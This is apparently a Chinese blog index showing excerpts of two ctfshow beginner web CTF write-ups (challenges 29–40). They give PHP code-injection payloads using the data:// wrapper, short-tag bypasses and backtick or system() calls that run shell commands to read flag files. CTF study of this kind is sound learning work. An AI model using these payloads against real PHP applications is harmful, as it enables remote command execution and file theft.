chtshow web入门37~40 发表于 2023-01-11 分类于 web , ctfshow , 刷题 本文字数: 1.2k 阅读时长 ≈ 1 分钟 web 37考察data伪协议,data伪协议需满足allow_url_fopen,allow_url_include同时开启才能使用。payload: 1/?c=data://text/plain,<?php system("cat fl*");?> web38php被过滤了,可以用短标签绕过php。短标签:比更灵活调用的方法 paylaod: 12?c=data://text/plain,<?=`cat fla*`;?>/?c=data://text/plain,<?=system("cat fl*");?> 阅读全文 »
ctfshow web入门29~36 发表于 2023-01-09 分类于 web , ctfshow , 刷题 本文字数: 936 阅读时长 ≈ 1 分钟 web29过滤了flag,可以用system,echo等。 12/?c=system("cat fla*");/?c=echo`cat fl*`; web30多过滤了一个system,还可以用echo。 1/?echo`cat fl*`; 阅读全文 »
